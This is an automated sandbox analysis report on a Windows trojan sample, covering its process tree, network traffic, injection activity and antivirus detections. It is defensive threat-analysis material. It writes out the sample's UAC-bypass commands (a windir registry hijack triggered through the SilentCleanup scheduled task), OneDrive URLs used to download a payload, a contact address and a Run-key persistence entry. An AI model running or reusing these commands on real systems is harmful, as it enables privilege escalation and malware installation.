Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6402	Sept. 4, 2021, 1:53 p.m.	Sept. 4, 2021, 1:56 p.m.

Size	731.5KB
Type	PE32 executable (GUI) Intel 80386, for MS Windows
MD5	`3386ae032f6d373ca53c4cdd9f2d8071`
SHA256	`e8fd9fa558e765a0a6273a0ba98195347c8c388491e4e6186fccf4d8a69baf84`
CRC32	`681C661C`
ssdeep	`12288:KAQ4TXPbFLYhC0MPsgGsXxItImX/m/zOOMH9L9T5kLvRJ:KZaZUhJOskXOt/vmb6kLJ`
Yara	PE_Header_Zero - PE File Signature Malicious_Library_Zero - Malicious_Library IsPE32 - (no description)

fit.exe "C:\Users\test22\AppData\Local\Temp\fit.exe"
560
- cmd.exe cmd /c ""C:\Users\Public\Trast.bat" "
  972
  - cmd.exe C:\Windows\system32\cmd.exe /K C:\Users\Public\UKO.bat
    808
    - reg.exe reg delete hkcu\Environment /v windir /f
      532
    - reg.exe reg add hkcu\Environment /v windir /d "cmd /c start /min C:\Users\Public\KDECO.bat reg delete hkcu\Environment /v windir /f && REM "
      1776
    - schtasks.exe schtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I
      2820
- cmd.exe cmd /c ""C:\Users\Public\nest.bat" "
  2980
  - reg.exe reg delete hkcu\Environment /v windir /f
    2556

Name	Response	Post-Analysis Lookup
twistednerd.dvrlists.com	A 62.102.148.152	62.102.148.152
ya5qxq.sn.files.1drv.com	CNAME odc-sn-files-geo.onedrive.akadns.net CNAME sn-files.fe.1drv.com CNAME sn-files.ha.1drv.com.l-0003.dc-msedge.net.l-0003.l-msedge.net A 13.107.42.12 CNAME odc-sn-files-brs.onedrive.akadns.net CNAME l-0003.l-msedge.net	13.107.42.12
onedrive.live.com	CNAME odc-web-geo.onedrive.akadns.net CNAME l-0004.l-msedge.net A 13.107.42.13 CNAME odwebpl.trafficmanager.net.l-0004.dc-msedge.net.l-0004.l-msedge.net CNAME odc-web-brs.onedrive.akadns.net	13.107.42.13

IP Address	Status	Action
13.107.42.12	Active	Moloch
13.107.42.13	Active	Moloch
164.124.101.2	Active	Moloch
62.102.148.152	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.102:49165 -> 13.107.42.12:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.102:49164 -> 13.107.42.13:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.102:49166 -> 13.107.42.12:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined

Suricata TLS

Flow	Issuer	Subject	Fingerprint
TLSv1 192.168.56.102:49164 13.107.42.13:443	C=US, O=Microsoft Corporation, CN=Microsoft RSA TLS CA 01	CN=onedrive.com	50:2f:33:10:92:ac:27:7b:17:be:82:68:3b:e2:29:ad:97:41:b7:bb
TLSv1 192.168.56.102:49165 13.107.42.12:443	C=US, O=Microsoft Corporation, CN=Microsoft RSA TLS CA 01	C=US, ST=WA, L=Redmond, O=Microsoft Corporation, OU=Microsoft Corporation, CN=storage.live.com	ec:e5:02:98:e6:c9:9a:12:fc:c0:4d:19:cd:2b:0c:ae:d0:c0:37:8e
TLSv1 192.168.56.102:49166 13.107.42.12:443	C=US, O=Microsoft Corporation, CN=Microsoft RSA TLS CA 01	C=US, ST=WA, L=Redmond, O=Microsoft Corporation, OU=Microsoft Corporation, CN=storage.live.com	ec:e5:02:98:e6:c9:9a:12:fc:c0:4d:19:cd:2b:0c:ae:d0:c0:37:8e

Queries for the computername (1 event)

Time & API	Arguments	Status	Return	Repeated
GetComputerNameW Sept. 4, 2021, 1:54 p.m.	computer_name: TEST22-PC	1	1	0

Command line console output was observed (22 events)

Time & API	Arguments	Status	Return
WriteConsoleW Sept. 4, 2021, 1:54 p.m.	buffer: C:\Users\Public> console_handle: 0x00000007	1	1
WriteConsoleW Sept. 4, 2021, 1:54 p.m.	buffer: start console_handle: 0x00000007	1	1
WriteConsoleW Sept. 4, 2021, 1:54 p.m.	buffer: /min C:\Users\Public\UKO.bat console_handle: 0x00000007	1	1
WriteConsoleW Sept. 4, 2021, 1:54 p.m.	buffer: C:\Users\Public> console_handle: 0x00000007	1	1
WriteConsoleW Sept. 4, 2021, 1:54 p.m.	buffer: reg console_handle: 0x00000007	1	1
WriteConsoleW Sept. 4, 2021, 1:54 p.m.	buffer: delete hkcu\Environment /v windir /f console_handle: 0x00000007	1	1
WriteConsoleW Sept. 4, 2021, 1:54 p.m.	buffer: C:\Users\Public> console_handle: 0x00000007	1	1
WriteConsoleW Sept. 4, 2021, 1:54 p.m.	buffer: reg console_handle: 0x00000007	1	1
WriteConsoleW Sept. 4, 2021, 1:54 p.m.	buffer: add hkcu\Environment /v windir /d "cmd /c start /min C:\Users\Public\KDECO.bat reg delete hkcu\Environment /v windir /f && REM " console_handle: 0x00000007	1	1
WriteConsoleW Sept. 4, 2021, 1:54 p.m.	buffer: C:\Users\Public> console_handle: 0x00000007	1	1
WriteConsoleW Sept. 4, 2021, 1:54 p.m.	buffer: schtasks console_handle: 0x00000007	1	1
WriteConsoleW Sept. 4, 2021, 1:54 p.m.	buffer: /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I console_handle: 0x00000007	1	1
WriteConsoleW Sept. 4, 2021, 1:54 p.m.	buffer: exit console_handle: 0x00000007	1	1
WriteConsoleW Sept. 4, 2021, 1:54 p.m.	buffer: ERROR: console_handle: 0x0000000b	1	1
WriteConsoleW Sept. 4, 2021, 1:54 p.m.	buffer: The system was unable to find the specified registry key or value. console_handle: 0x0000000b	1	1
WriteConsoleW Sept. 4, 2021, 1:54 p.m.	buffer: The operation completed successfully. console_handle: 0x00000007	1	1
WriteConsoleW Sept. 4, 2021, 1:54 p.m.	buffer: ERROR: console_handle: 0x0000000b	1	1
WriteConsoleW Sept. 4, 2021, 1:54 p.m.	buffer: The system cannot find the path specified. console_handle: 0x0000000b	1	1
WriteConsoleW Sept. 4, 2021, 1:54 p.m.	buffer: C:\Users\Public> console_handle: 0x00000007	1	1
WriteConsoleW Sept. 4, 2021, 1:54 p.m.	buffer: start console_handle: 0x00000007	1	1
WriteConsoleW Sept. 4, 2021, 1:54 p.m.	buffer: /min reg delete hkcu\Environment /v windir /f console_handle: 0x00000007	1	1
WriteConsoleW Sept. 4, 2021, 1:54 p.m.	buffer: The operation completed successfully. console_handle: 0x00000007	1	1

The executable contains unknown PE section names indicative of a packer (could be a false positive) (3 events)

section	CODE
section	DATA
section	BSS

The executable uses a known packer (1 event)

packer

BobSoft Mini Delphi -> BoB / BobSoft

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

Performs some HTTP requests (3 events)

request	GET https://onedrive.live.com/download?cid=D6676A9A61E841F3&resid=D6676A9A61E841F3%21145&authkey=AFt5mXo5_hIU9Wo
request	GET https://ya5qxq.sn.files.1drv.com/y4mWV0lrv_tiHoBpZFLgeGeAoOLHwgJmNqdH0OgjUFuy2BNr8G1IO_HRyR6jrXDrImiFe2QUvT74VBUi5sedcd9fLF9dxoWww6_21cF9mI_hsgFoBYR5C-53tzBarzEgUjh_sHrNCdGK_piD2dAN0Pt76qJhizWP4egLLhy7FriuiAueVsovba7AN1mG-Ds_Hqv63TZr0t6kELXRIsqvIrriA/Zmtabitkattqctosiqoboivzoukwwhu?download&psid=1
request	GET https://ya5qxq.sn.files.1drv.com/y4mhkdES2FrzkTr6_ft2vmvKfb9bGMafvF6erpDGpYTyyTou4wOYM--o-pDpWFRoe7XtvHGmX-j_fZ9jW-sMy0xF9LNy6xYLxCqh457rSVvRZ9mXnrhAbWBC7JoY6cVQXsaxJXaqxeEx9ypdygh-0x4PHsyE4Rqwgt5FVSoogr_d7kT53WzOlK4QTYdvaXtyMutkLvh5570BfFK65a9VkcfOA/Zmtabitkattqctosiqoboivzoukwwhu?download&psid=1

Allocates read-write-execute memory (usually to unpack itself) (4 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory Sept. 4, 2021, 1:53 p.m.	process_identifier: 560 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x005f0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 4, 2021, 1:53 p.m.	process_identifier: 560 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73e52000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 4, 2021, 1:54 p.m.	process_identifier: 560 region_size: 507904 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x10590000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 4, 2021, 1:54 p.m.	process_identifier: 560 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 495616 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x10591000 process_handle: 0xffffffff	1

Creates executable files on the filesystem (5 events)

file	C:\Users\Public\KDECO.bat
file	C:\Users\Public\UKO.bat
file	C:\Users\Public\Libraries\Zmtabit\Zmtabit.exe
file	C:\Users\Public\Trast.bat
file	C:\Users\Public\nest.bat

Creates a suspicious process (2 events)

cmdline	C:\Windows\system32\cmd.exe /K C:\Users\Public\UKO.bat
cmdline	schtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I

Changes read-write memory protection to read-execute (probably to avoid detection when setting all RWX flags at the same time) (1 event)

Time & API	Arguments	Status	Return	Repeated
NtProtectVirtualMemory Sept. 4, 2021, 1:54 p.m.	process_identifier: 560 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 81920 protection: 32 (PAGE_EXECUTE_READ) base_address: 0x00631000 process_handle: 0xffffffff	1	0	0

The binary likely contains encrypted or compressed data indicative of a packer (2 events)

section

{u'size_of_data': u'0x00036000', u'virtual_address': u'0x00086000', u'entropy': 7.327482100356089, u'name': u'.rsrc', u'virtual_size': u'0x00036000'}

entropy

7.32748210036

description

A section with a high entropy has been found

entropy

0.29568788501

description

Overall entropy of this PE file is high

Yara rule detected in process memory (50 out of 60 events)

description	Communication using DGA	rule	Network_DGA
description	Communications use DNS	rule	Network_DNS
description	Communications over RAW Socket	rule	Network_TCP_Socket
description	Create a windows service	rule	Create_Service
description	Record Audio	rule	Sniff_Audio
description	Escalate priviledges	rule	Escalate_priviledges
description	Run a KeyLogger	rule	KeyLogger
description	Code injection with CreateRemoteThread in a remote process	rule	Code_injection
description	Communications over HTTP	rule	Network_HTTP
description	Match Windows Inet API call	rule	Str_Win32_Internet_API
description	Communications over FTP	rule	Network_FTP
description	Take ScreenShot	rule	ScreenShot
description	Match Windows Http API call	rule	Str_Win32_Http_API
description	Steal credential	rule	local_credential_Steal
description	File Downloader	rule	Network_Downloader
description	Communications over P2P network	rule	Network_P2P_Win
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerCheck__RemoteAPI
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	DebuggerException__ConsoleCtrl
description	(no description)	rule	DebuggerException__SetConsoleCtrl
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	(no description)	rule	Check_Dlls
description	Checks if being debugged	rule	anti_dbg
description	Anti-Sandbox checks for ThreatExpert	rule	antisb_threatExpert
description	Bypass DEP	rule	disable_dep
description	Affect hook table	rule	win_hook
description	Communication using DGA	rule	Network_DGA
description	Communications use DNS	rule	Network_DNS
description	Communications over RAW Socket	rule	Network_TCP_Socket
description	Create a windows service	rule	Create_Service
description	Record Audio	rule	Sniff_Audio
description	Escalate priviledges	rule	Escalate_priviledges
description	Run a KeyLogger	rule	KeyLogger
description	Code injection with CreateRemoteThread in a remote process	rule	Code_injection
description	Communications over HTTP	rule	Network_HTTP
description	Match Windows Inet API call	rule	Str_Win32_Internet_API
description	Communications over FTP	rule	Network_FTP
description	Take ScreenShot	rule	ScreenShot
description	Match Windows Http API call	rule	Str_Win32_Http_API
description	Steal credential	rule	local_credential_Steal
description	File Downloader	rule	Network_Downloader
description	Communications over P2P network	rule	Network_P2P_Win
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerCheck__RemoteAPI
description	(no description)	rule	DebuggerHiding__Thread

Uses Windows utilities for basic Windows functionality (3 events)

cmdline	schtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I
cmdline	reg delete hkcu\Environment /v windir /f
cmdline	reg add hkcu\Environment /v windir /d "cmd /c start /min C:\Users\Public\KDECO.bat reg delete hkcu\Environment /v windir /f && REM "

One or more of the buffers contains an embedded PE file (1 event)

buffer

Buffer with sha1: 1216e33d89cdcb279ce6729e16649aa0247cc847

Allocates execute permission to another process indicative of possible code injection (12 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory Sept. 4, 2021, 1:54 p.m.	process_identifier: 1644 region_size: 507904 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x10590000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000540	1
NtAllocateVirtualMemory Sept. 4, 2021, 1:54 p.m.	process_identifier: 1644 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000f0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0x00000540	1
NtAllocateVirtualMemory Sept. 4, 2021, 1:54 p.m.	process_identifier: 1644 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00100000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000540	1
NtAllocateVirtualMemory Sept. 4, 2021, 1:54 p.m.	process_identifier: 1644 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00110000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000540	1
NtAllocateVirtualMemory Sept. 4, 2021, 1:54 p.m.	process_identifier: 1644 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00120000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000540	1
NtAllocateVirtualMemory Sept. 4, 2021, 1:54 p.m.	process_identifier: 1644 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00130000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000540	1
NtAllocateVirtualMemory Sept. 4, 2021, 1:54 p.m.	process_identifier: 1644 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00200000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000540	1
NtAllocateVirtualMemory Sept. 4, 2021, 1:54 p.m.	process_identifier: 1644 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00210000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000540	1
NtAllocateVirtualMemory Sept. 4, 2021, 1:54 p.m.	process_identifier: 1644 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00220000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000540	1
NtAllocateVirtualMemory Sept. 4, 2021, 1:54 p.m.	process_identifier: 1644 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00230000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000540	1
NtAllocateVirtualMemory Sept. 4, 2021, 1:54 p.m.	process_identifier: 1644 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00240000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000540	1
NtAllocateVirtualMemory Sept. 4, 2021, 1:54 p.m.	process_identifier: 1644 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00250000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000540	1

Installs itself for autorun at Windows startup (1 event)

reg_key

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Zmtabit

reg_value

C:\Users\Public\Libraries\tibatmZ.url

Creates a thread using CreateRemoteThread in a non-child process indicative of process injection (5 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 560 created a remote thread in non-child process 1644
CreateRemoteThread Sept. 4, 2021, 1:54 p.m.	thread_identifier: 2816 process_identifier: 1644 function_address: 0x000f0000 flags: 0 stack_size: 0 parameter: 0x00000000 process_handle: 0x00000540	1	1352	0
CreateRemoteThread Sept. 4, 2021, 1:54 p.m.	thread_identifier: 2208 process_identifier: 1644 function_address: 0x00130000 flags: 0 stack_size: 0 parameter: 0x00120000 process_handle: 0x00000540	1	1352	0
CreateRemoteThread Sept. 4, 2021, 1:54 p.m.	thread_identifier: 2828 process_identifier: 1644 function_address: 0x00230000 flags: 0 stack_size: 0 parameter: 0x00220000 process_handle: 0x00000540	1	1348	0
CreateRemoteThread Sept. 4, 2021, 1:54 p.m.	thread_identifier: 2860 process_identifier: 1644 function_address: 0x00250000 flags: 0 stack_size: 0 parameter: 0x00240000 process_handle: 0x00000540	1	1360	0

Manipulates memory of a non-child process indicative of process injection (13 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 560 manipulating memory of non-child process 1644
NtAllocateVirtualMemory Sept. 4, 2021, 1:54 p.m.	process_identifier: 1644 region_size: 507904 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x10590000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000540	1	0	0
NtAllocateVirtualMemory Sept. 4, 2021, 1:54 p.m.	process_identifier: 1644 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000f0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0x00000540	1	0	0
NtAllocateVirtualMemory Sept. 4, 2021, 1:54 p.m.	process_identifier: 1644 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00100000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000540	1	0	0
NtAllocateVirtualMemory Sept. 4, 2021, 1:54 p.m.	process_identifier: 1644 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00110000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000540	1	0	0
NtAllocateVirtualMemory Sept. 4, 2021, 1:54 p.m.	process_identifier: 1644 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00120000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000540	1	0	0
NtAllocateVirtualMemory Sept. 4, 2021, 1:54 p.m.	process_identifier: 1644 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00130000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000540	1	0	0
NtAllocateVirtualMemory Sept. 4, 2021, 1:54 p.m.	process_identifier: 1644 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00200000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000540	1	0	0
NtAllocateVirtualMemory Sept. 4, 2021, 1:54 p.m.	process_identifier: 1644 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00210000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000540	1	0	0
NtAllocateVirtualMemory Sept. 4, 2021, 1:54 p.m.	process_identifier: 1644 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00220000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000540	1	0	0
NtAllocateVirtualMemory Sept. 4, 2021, 1:54 p.m.	process_identifier: 1644 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00230000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000540	1	0	0
NtAllocateVirtualMemory Sept. 4, 2021, 1:54 p.m.	process_identifier: 1644 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00240000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000540	1	0	0
NtAllocateVirtualMemory Sept. 4, 2021, 1:54 p.m.	process_identifier: 1644 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00250000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000540	1	0	0

Potential code injection by writing to the memory of another process (12 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 560 injected into non-child 1644
WriteProcessMemory Sept. 4, 2021, 1:54 p.m.	buffer: hÿhÿ×I¤vÕ³wkernel32.dllÿ<û:\ú:¾ttú:Ét ý~pú:latQytû ý~ú::t6;£tû:mØtäú:äú:ÿÿÿÿPû:<û:B?¤ÿ$¤,û:,%¤ôú:0v.4v.,û:¹E¥ÁE¥`û:F¤ base_address: 0x000f0000 process_identifier: 1644 process_handle: 0x00000540	1	1	0
WriteProcessMemory Sept. 4, 2021, 1:54 p.m.	buffer: GetProcAddress base_address: 0x00100000 process_identifier: 1644 process_handle: 0x00000540	1	1	0
WriteProcessMemory Sept. 4, 2021, 1:54 p.m.	buffer: kernel32.dll base_address: 0x00110000 process_identifier: 1644 process_handle: 0x00000540	1	1	0
WriteProcessMemory Sept. 4, 2021, 1:54 p.m.	buffer: Õ³w"¤vE¤v base_address: 0x00120000 process_identifier: 1644 process_handle: 0x00000540	1	1	0
WriteProcessMemory Sept. 4, 2021, 1:54 p.m.	buffer: UìÄìVWEð}ì¥¥¥¥¥ÿuøÿUôÿuüPÿUðPÿUì_^å]ÂÀUìÄàSVWùUüØu3ÀEøh,N¥h@N¥èÿÿPèÿÿEèhPN¥h@N¥èéÿÿPèëÿÿEäh`N¥h@N¥èÑÿÿPèÓÿÿEàþu}ðëÎ×ÃèGüÿÿEðUüÃè¢ûÿÿEìjjMàº8M¥Ãè`üÿÿØÛtjÿSèRÿÿEôPSè@ÿÿEôEøEø_^[å]ÂGetModuleHandleAkernel32.dllGetProcAddressExitThreadUìÄìSEüEüEøE@ü¤EôëUEø@èÑèEìEøÀEðUìJÒr0BEðföÅðtE@ô]øfáÿ·ÉÁMIøEðJuÑEðEøEø+Eü;Eôr [å]Ã base_address: 0x00130000 process_identifier: 1644 process_handle: 0x00000540	1	1	0
WriteProcessMemory Sept. 4, 2021, 1:54 p.m.	buffer: LoadLibraryA base_address: 0x00200000 process_identifier: 1644 process_handle: 0x00000540	1	1	0
WriteProcessMemory Sept. 4, 2021, 1:54 p.m.	buffer: kernel32.dll base_address: 0x00210000 process_identifier: 1644 process_handle: 0x00000540	1	1	0
WriteProcessMemory Sept. 4, 2021, 1:54 p.m.	buffer: Õ³w"¤vE¤v! base_address: 0x00220000 process_identifier: 1644 process_handle: 0x00000540	1	1	0
WriteProcessMemory Sept. 4, 2021, 1:54 p.m.	buffer: UìÄìVWEð}ì¥¥¥¥¥ÿuøÿUôÿuüPÿUðPÿUì_^å]ÂÀUìÄàSVWùUüØu3ÀEøh,N¥h@N¥èÿÿPèÿÿEèhPN¥h@N¥èéÿÿPèëÿÿEäh`N¥h@N¥èÑÿÿPèÓÿÿEàþu}ðëÎ×ÃèGüÿÿEðUüÃè¢ûÿÿEìjjMàº8M¥Ãè`üÿÿØÛtjÿSèRÿÿEôPSè@ÿÿEôEøEø_^[å]ÂGetModuleHandleAkernel32.dllGetProcAddressExitThreadUìÄìSEüEüEøE@ü¤EôëUEø@èÑèEìEøÀEðUìJÒr0BEðföÅðtE@ô]øfáÿ·ÉÁMIøEðJuÑEðEøEø+Eü;Eôr [å]Ã base_address: 0x00230000 process_identifier: 1644 process_handle: 0x00000540	1	1	0
WriteProcessMemory Sept. 4, 2021, 1:54 p.m.	buffer: YýY base_address: 0x00240000 process_identifier: 1644 process_handle: 0x00000540	1	1	0
WriteProcessMemory Sept. 4, 2021, 1:54 p.m.	buffer: UìÄøEUøPUü1ÀPjÿuøÿUüYY]Â@UìÄÔSVWúðEÔ\D¥èñÿÿ3ÀUh%M¥dÿ0d ÆEÿG<ÇEô»Ãj@h0Eô@PPEô@4ÃPèÄÿÿEð}ðt0hjEðPè»ÿÿj@h0Eô@PPEô@4ÃPVèÿÿEð}ðuû0vEÔPÏUðÆèEÔÀt7EèUàUìUøRUØRPEðPVèÿÿjjMèºðK¥Æè_ýÿÿÀtÆEÿ3ÀZYYdh,M¥EÔ\D¥èÄÿÿÃ base_address: 0x00250000 process_identifier: 1644 process_handle: 0x00000540	1	1	0

Network activity contains more than one unique useragent (2 events)

process	fit.exe				useragent	zipo
process	fit.exe				useragent	aswe

Resumed a suspended thread in a remote process potentially indicative of process injection (4 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 972 resumed a thread in remote process 808
Process injection	Process 2980 resumed a thread in remote process 2556
NtResumeThread Sept. 4, 2021, 1:54 p.m.	thread_handle: 0x00000088 suspend_count: 0 process_identifier: 808	1	0	0
NtResumeThread Sept. 4, 2021, 1:54 p.m.	thread_handle: 0x00000088 suspend_count: 0 process_identifier: 2556	1	0	0

Uses Sysinternals tools in order to add additional command line functionality (1 event)

cmdline

C:\Windows\System32\mobsync.exe

File has been identified by 21 AntiVirus engines on VirusTotal as malicious (21 events)

Bkav	W32.AIDetect.malware2
Elastic	malicious (high confidence)
FireEye	Generic.mg.3386ae032f6d373c
McAfee	RDN/Generic.grp
BitDefenderTheta	Gen:NN.ZelphiF.34126.TGW@aKd5o7ji
ESET-NOD32	a variant of Win32/Injector.EPZM
APEX	Malicious
Paloalto	generic.ml
Kaspersky	UDS:DangerousObject.Multi.Generic
Rising	Trojan.Generic@ML.95 (RDML:O/aTsu0Y/2Mz4Z7CIDZ/gQ)
McAfee-GW-Edition	BehavesLike.Win32.Fareit.bc
SentinelOne	Static AI - Malicious PE
eGambit	Unsafe.AI_Score_97%
Kingsoft	Win32.Troj.Generic_a.a.(kcloud)
Microsoft	Trojan:Win32/Sabsik.FL.B!ml
Cynet	Malicious (score: 100)
VBA32	BScope.TrojanSpy.Noon
Ikarus	Trojan.Inject
MaxSecure	Trojan.Malware.300983.susgen
Webroot	W32.Malware.Gen
CrowdStrike	win/malicious_confidence_60% (W)

Connects to an IP address that is no longer responding to requests (legitimate services will remain up-and-running usually) (1 event)

dead_host

62.102.148.152:8618

fit.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All